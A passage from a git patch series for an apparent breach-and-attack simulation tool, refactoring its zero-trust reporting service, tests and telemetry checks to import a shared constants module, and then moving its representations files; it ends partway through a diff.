TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_TUNNELING][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, ], - WORKLOADS: [] + zero_trust_consts.WORKLOADS: [] } def save_example_findings(): # arrange - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 1 - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 2 - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_FAILED, []) # devices failed = 1 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_PASSED, + []) # devices passed = 1 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_PASSED, + []) # devices passed = 2 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_FAILED, + []) # devices failed = 1 # devices unexecuted = 1 # people verify = 1 # networks verify = 1 - Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY, []) # people verify = 2 # networks verify = 2 - Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY, []) # data failed 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 2 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 3 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 4 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 5 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data verify 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY, []) # data verify 2 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY, []) # data passed 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_PASSED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_PASSED, []) class TestZeroTrustService(IslandTestCase): @@ -191,52 +203,52 @@ class TestZeroTrustService(IslandTestCase): expected = [ { - STATUS_FAILED: 5, - STATUS_VERIFY: 2, - STATUS_PASSED: 1, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 5, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 1, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "Data" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 2, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "People" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 2, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 4, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 4, "pillar": "Networks" }, { - STATUS_FAILED: 1, - STATUS_VERIFY: 0, - STATUS_PASSED: 2, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 1, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 2, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "Devices" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0, "pillar": "Workloads" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 3, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 3, "pillar": "Visibility & Analytics" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0, "pillar": "Automation & Orchestration" } ] @@ -279,13 +291,13 @@ class TestZeroTrustService(IslandTestCase): self.maxDiff = None expected = { - AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED, - DEVICES: STATUS_UNEXECUTED, - NETWORKS: STATUS_UNEXECUTED, - PEOPLE: STATUS_UNEXECUTED, - VISIBILITY_ANALYTICS: STATUS_UNEXECUTED, - WORKLOADS: STATUS_UNEXECUTED, - DATA: STATUS_UNEXECUTED + zero_trust_consts.AUTOMATION_ORCHESTRATION: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DEVICES: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.NETWORKS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DATA: zero_trust_consts.STATUS_UNEXECUTED } self.assertEqual(ZeroTrustService.get_pillars_to_statuses(), expected) @@ -293,13 +305,13 @@ class TestZeroTrustService(IslandTestCase): save_example_findings() expected = { - AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED, - DEVICES: STATUS_FAILED, - NETWORKS: STATUS_VERIFY, - PEOPLE: STATUS_VERIFY, - VISIBILITY_ANALYTICS: STATUS_UNEXECUTED, - WORKLOADS: STATUS_UNEXECUTED, - DATA: STATUS_FAILED + zero_trust_consts.AUTOMATION_ORCHESTRATION: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DEVICES: zero_trust_consts.STATUS_FAILED, + zero_trust_consts.NETWORKS: zero_trust_consts.STATUS_VERIFY, + zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_VERIFY, + zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DATA: zero_trust_consts.STATUS_FAILED } self.assertEqual(ZeroTrustService.get_pillars_to_statuses(), expected) diff --git a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py index 24bd81e0d..9937c0b6d 100644 --- a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py @@ -1,8 +1,7 @@ import json -from common.data.zero_trust_consts import PILLARS, STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED, \ - PILLARS_TO_TESTS, TESTS_MAP, PILLARS_KEY, PRINCIPLES_TO_TESTS, PRINCIPLES_TO_PILLARS, PRINCIPLES, ORDERED_TEST_STATUSES, \ - TEST_EXPLANATION_KEY, FINDING_EXPLANATION_BY_STATUS_KEY +import common.data.zero_trust_consts as zero_trust_consts + from monkey_island.cc.models.zero_trust.finding import Finding @@ -10,7 +9,7 @@ class ZeroTrustService(object): @staticmethod def get_pillars_grades(): pillars_grades = [] - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: pillars_grades.append(ZeroTrustService.__get_pillar_grade(pillar)) return pillars_grades @@ -19,13 +18,13 @@ class ZeroTrustService(object): all_findings = Finding.objects() pillar_grade = { "pillar": pillar, - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0 + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0 } - tests_of_this_pillar = PILLARS_TO_TESTS[pillar] + tests_of_this_pillar = zero_trust_consts.PILLARS_TO_TESTS[pillar] test_unexecuted = {} for test in tests_of_this_pillar: @@ -33,11 +32,11 @@ class ZeroTrustService(object): for finding in all_findings: test_unexecuted[finding.test] = False - test_info = TESTS_MAP[finding.test] - if pillar in test_info[PILLARS_KEY]: + test_info = zero_trust_consts.TESTS_MAP[finding.test] + if pillar in test_info[zero_trust_consts.PILLARS_KEY]: pillar_grade[finding.status] += 1 - pillar_grade[STATUS_UNEXECUTED] = sum(1 for condition in list(test_unexecuted.values()) if condition) + pillar_grade[zero_trust_consts.STATUS_UNEXECUTED] = sum(1 for condition in list(test_unexecuted.values()) if condition) return pillar_grade @@ -46,14 +45,14 @@ class ZeroTrustService(object): all_principles_statuses = {} # init with empty lists - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: all_principles_statuses[pillar] = [] - for principle, principle_tests in list(PRINCIPLES_TO_TESTS.items()): - for pillar in PRINCIPLES_TO_PILLARS[principle]: + for principle, principle_tests in list(zero_trust_consts.PRINCIPLES_TO_TESTS.items()): + for pillar in zero_trust_consts.PRINCIPLES_TO_PILLARS[principle]: all_principles_statuses[pillar].append( { - "principle": PRINCIPLES[principle], + "principle": zero_trust_consts.PRINCIPLES[principle], "tests": ZeroTrustService.__get_tests_status(principle_tests), "status": ZeroTrustService.__get_principle_status(principle_tests) } @@ -63,13 +62,13 @@ class ZeroTrustService(object): @staticmethod def __get_principle_status(principle_tests): - worst_status = STATUS_UNEXECUTED + worst_status = zero_trust_consts.STATUS_UNEXECUTED all_statuses = set() for test in principle_tests: all_statuses |= set(Finding.objects(test=test).distinct("status")) for status in all_statuses: - if ORDERED_TEST_STATUSES.index(status) < ORDERED_TEST_STATUSES.index(worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index(status) < zero_trust_consts.ORDERED_TEST_STATUSES.index(worst_status): worst_status = status return worst_status @@ -81,7 +80,7 @@ class ZeroTrustService(object): test_findings = Finding.objects(test=test) results.append( { - "test": TESTS_MAP[test][TEST_EXPLANATION_KEY], + "test": zero_trust_consts.TESTS_MAP[test][zero_trust_consts.TEST_EXPLANATION_KEY], "status": ZeroTrustService.__get_lcd_worst_status_for_test(test_findings) } ) @@ -94,9 +93,9 @@ class ZeroTrustService(object): :return: the "worst" (i.e. most severe) status out of the given findings. lcd stands for lowest common denominator. """ - current_worst_status = STATUS_UNEXECUTED + current_worst_status = zero_trust_consts.STATUS_UNEXECUTED for finding in all_findings_for_test: - if ORDERED_TEST_STATUSES.index(finding.status) < ORDERED_TEST_STATUSES.index(current_worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index(finding.status) < zero_trust_consts.ORDERED_TEST_STATUSES.index(current_worst_status): current_worst_status = finding.status return current_worst_status @@ -109,11 +108,11 @@ class ZeroTrustService(object): @staticmethod def __get_enriched_finding(finding): - test_info = TESTS_MAP[finding.test] + test_info = zero_trust_consts.TESTS_MAP[finding.test] enriched_finding = { - "test": test_info[FINDING_EXPLANATION_BY_STATUS_KEY][finding.status], + "test": test_info[zero_trust_consts.FINDING_EXPLANATION_BY_STATUS_KEY][finding.status], "test_key": finding.test, - "pillars": test_info[PILLARS_KEY], + "pillars": test_info[zero_trust_consts.PILLARS_KEY], "status": finding.status, "events": ZeroTrustService.__get_events_as_dict(finding.events) } @@ -126,12 +125,12 @@ class ZeroTrustService(object): @staticmethod def get_statuses_to_pillars(): results = { - STATUS_FAILED: [], - STATUS_VERIFY: [], - STATUS_PASSED: [], - STATUS_UNEXECUTED: [] + zero_trust_consts.STATUS_FAILED: [], + zero_trust_consts.STATUS_VERIFY: [], + zero_trust_consts.STATUS_PASSED: [], + zero_trust_consts.STATUS_UNEXECUTED: [] } - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: results[ZeroTrustService.__get_status_of_single_pillar(pillar)].append(pillar) return results @@ -139,7 +138,7 @@ class ZeroTrustService(object): @staticmethod def get_pillars_to_statuses(): results = {} - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: results[pillar] = ZeroTrustService.__get_status_of_single_pillar(pillar) return results @@ -147,7 +146,7 @@ class ZeroTrustService(object): @staticmethod def __get_status_of_single_pillar(pillar): grade = ZeroTrustService.__get_pillar_grade(pillar) - for status in ORDERED_TEST_STATUSES: + for status in zero_trust_consts.ORDERED_TEST_STATUSES: if grade[status] > 0: return status - return STATUS_UNEXECUTED + return zero_trust_consts.STATUS_UNEXECUTED diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py index db5b6445d..ddc1af65b 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py @@ -1,7 +1,6 @@ import json -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_LOCAL, \ - STATUS_PASSED, STATUS_FAILED, TEST_ENDPOINT_SECURITY_EXISTS +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event @@ -14,7 +13,7 @@ def test_antivirus_existence(telemetry_json): process_list_event = Event.create_event( title="Process list", message="Monkey on {} scanned the process list".format(current_monkey.hostname), - event_type=EVENT_TYPE_MONKEY_LOCAL) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL) events = [process_list_event] av_processes = filter_av_processes(telemetry_json) @@ -24,15 +23,15 @@ def test_antivirus_existence(telemetry_json): title="Found AV process", message="The process '{}' was recognized as an Anti Virus process. Process " "details: {}".format(process[1]['name'], json.dumps(process[1])), - event_type=EVENT_TYPE_MONKEY_LOCAL + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL )) if len(av_processes) > 0: - test_status = STATUS_PASSED + test_status = zero_trust_consts.STATUS_PASSED else: - test_status = STATUS_FAILED + test_status = zero_trust_consts.STATUS_FAILED AggregateFinding.create_or_add_to_existing( - test=TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events + test=zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py index 6c5b1154b..f6af5e4bf 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py @@ -1,5 +1,4 @@ -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_COMMUNICATE_AS_NEW_USER, \ - STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event @@ -10,9 +9,9 @@ COMM_AS_NEW_USER_SUCCEEDED_FORMAT = \ def test_new_user_communication(current_monkey, success, message): AggregateFinding.create_or_add_to_existing( - test=TEST_COMMUNICATE_AS_NEW_USER, + test=zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER, # If the monkey succeeded to create a user, then the test failed. - status=STATUS_FAILED if success else STATUS_PASSED, + status=zero_trust_consts.STATUS_FAILED if success else zero_trust_consts.STATUS_PASSED, events=[ get_attempt_event(current_monkey), get_result_event(current_monkey, message, success) @@ -24,7 +23,7 @@ def get_attempt_event(current_monkey): tried_to_communicate_event = Event.create_event( title="Communicate as new user", message="Monkey on {} tried to create a new user and communicate from it.".format(current_monkey.hostname), - event_type=EVENT_TYPE_MONKEY_NETWORK) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) return tried_to_communicate_event @@ -34,4 +33,4 @@ def get_result_event(current_monkey, message, success): return Event.create_event( title="Communicate as new user", message=message_format.format(current_monkey.hostname, message), - event_type=EVENT_TYPE_MONKEY_NETWORK) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py index e6afcf088..d7b447e4a 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py @@ -1,8 +1,7 @@ import json from common.data.network_consts import ES_SERVICE -from common.data.zero_trust_consts import STATUS_PASSED, EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_DATA_ENDPOINT_HTTP, \ - TEST_DATA_ENDPOINT_ELASTIC +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event @@ -13,8 +12,8 @@ HTTP_SERVERS_SERVICES_NAMES = ['tcp-80'] def test_open_data_endpoints(telemetry_json): services = telemetry_json["data"]["machine"]["services"] current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) - found_http_server_status = STATUS_PASSED - found_elastic_search_server = STATUS_PASSED + found_http_server_status = zero_trust_consts.STATUS_PASSED + found_elastic_search_server = zero_trust_consts.STATUS_PASSED events = [ Event.create_event( @@ -22,7 +21,7 @@ def test_open_data_endpoints(telemetry_json): message="Monkey on {} tried to perform a network scan, the target was {}.".format( current_monkey.hostname, telemetry_json["data"]["machine"]["ip_addr"]), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=telemetry_json["timestamp"] ) ] @@ -31,10 +30,10 @@ def test_open_data_endpoints(telemetry_json): events.append(Event.create_event( title="Scan telemetry analysis", message="Scanned service: {}.".format(service_name), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) if service_name in HTTP_SERVERS_SERVICES_NAMES: - found_http_server_status = STATUS_FAILED + found_http_server_status = zero_trust_consts.STATUS_FAILED events.append(Event.create_event( title="Scan telemetry analysis", message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( @@ -42,10 +41,10 @@ def test_open_data_endpoints(telemetry_json): telemetry_json["data"]["machine"]["ip_addr"], json.dumps(service_data) ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) if service_name == ES_SERVICE: - found_elastic_search_server = STATUS_FAILED + found_elastic_search_server = zero_trust_consts.STATUS_FAILED events.append(Event.create_event( title="Scan telemetry analysis", message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( @@ -53,17 +52,17 @@ def test_open_data_endpoints(telemetry_json): telemetry_json["data"]["machine"]["ip_addr"], json.dumps(service_data) ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) AggregateFinding.create_or_add_to_existing( - test=TEST_DATA_ENDPOINT_HTTP, + test=zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, status=found_http_server_status, events=events ) AggregateFinding.create_or_add_to_existing( - test=TEST_DATA_ENDPOINT_ELASTIC, + test=zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC, status=found_elastic_search_server, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index fe0015576..8c128e7f9 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED, STATUS_FAILED, TEST_MACHINE_EXPLOITED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event @@ -11,11 +11,11 @@ def test_machine_exploited(current_monkey, exploit_successful, exploiter, target current_monkey.hostname, target_ip, exploiter), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=timestamp ) ] - status = STATUS_PASSED + status = zero_trust_consts.STATUS_PASSED if exploit_successful: events.append( Event.create_event( @@ -24,13 +24,13 @@ def test_machine_exploited(current_monkey, exploit_successful, exploiter, target current_monkey.hostname, target_ip, exploiter), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=timestamp) ) - status = STATUS_FAILED + status = zero_trust_consts.STATUS_FAILED AggregateFinding.create_or_add_to_existing( - test=TEST_MACHINE_EXPLOITED, + test=zero_trust_consts.TEST_MACHINE_EXPLOITED, status=status, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py index 626a4cc52..f2c3f61b6 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py @@ -1,6 +1,6 @@ import itertools -from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from common.network.network_range import NetworkRange from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst, get_ip_if_in_subnet from monkey_island.cc.models import Monkey @@ -28,7 +28,7 @@ def test_segmentation_violation(current_monkey, target_ip): event = get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet) SegmentationFinding.create_or_add_to_existing_finding( subnets=[source_subnet, target_subnet], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -66,7 +66,7 @@ def get_segmentation_violation_event(current_monkey, source_subnet, target_ip, t target_ip=target_ip, target_seg=target_subnet ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) @@ -92,7 +92,7 @@ def create_or_add_findings_for_all_pairs(all_subnets, current_monkey): for subnet_pair in all_subnets_pairs_for_this_monkey: SegmentationFinding.create_or_add_to_existing_finding( subnets=list(subnet_pair), - status=STATUS_PASSED, + status=zero_trust_consts.STATUS_PASSED, segmentation_event=get_segmentation_done_event(current_monkey, subnet_pair) ) @@ -104,5 +104,5 @@ def get_segmentation_done_event(current_monkey, subnet_pair): hostname=current_monkey.hostname, src_seg=subnet_pair[0], dst_seg=subnet_pair[1]), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py index 900ac2f89..50d5f1c0b 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py @@ -1,7 +1,6 @@ import uuid -from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_PASSED, STATUS_FAILED, \ - EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding @@ -26,21 +25,29 @@ class TestSegmentationTests(IslandTestCase): ip_addresses=[FIRST_SUBNET]) # no findings - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 0) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 0) # This is like the monkey is done and sent done telem create_or_add_findings_for_all_pairs(all_subnets, monkey) # There are 2 subnets in which the monkey is NOT - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 2) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED)), + 2) # This is a monkey from 2nd subnet communicated with 1st subnet. SegmentationFinding.create_or_add_to_existing_finding( [FIRST_SUBNET, SECOND_SUBNET], - STATUS_FAILED, - Event.create_event(title="sdf", message="asd", event_type=EVENT_TYPE_MONKEY_NETWORK) + zero_trust_consts.STATUS_FAILED, + Event.create_event(title="sdf", message="asd", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) ) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 1) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_FAILED)), 1) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 2) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED)), + 1) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED)), + 1) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), + 2) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py index ce34c2bb4..e402525c8 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_TUNNELING, STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event @@ -14,13 +14,13 @@ def test_tunneling_violation(tunnel_telemetry_json): title="Tunneling event", message="Monkey on {hostname} tunneled traffic through {proxy}.".format( hostname=current_monkey.hostname, proxy=tunnel_host_ip), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=tunnel_telemetry_json['timestamp'] )] AggregateFinding.create_or_add_to_existing( - test=TEST_TUNNELING, - status=STATUS_FAILED, + test=zero_trust_consts.TEST_TUNNELING, + status=zero_trust_consts.STATUS_FAILED, events=tunneling_events ) From bcf2d964d767a9c383fcf499aaad2cb8e8b940f2 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 4 Nov 2019 11:44:25 +0200 Subject: [PATCH 44/53] Moved representations to services --- monkey/monkey_island/cc/app.py | 8 ++++---- .../cc/{resources => services}/representations.py | 0 .../cc/{resources => services}/representations_test.py | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) rename monkey/monkey_island/cc/{resources => services}/representations.py (100%) rename monkey/monkey_island/cc/{resources => services}/representations_test.py (95%) diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 9b5e7b849..be2430dda 100644 --- a/monkey/monkey_island/cc/app.py +++ 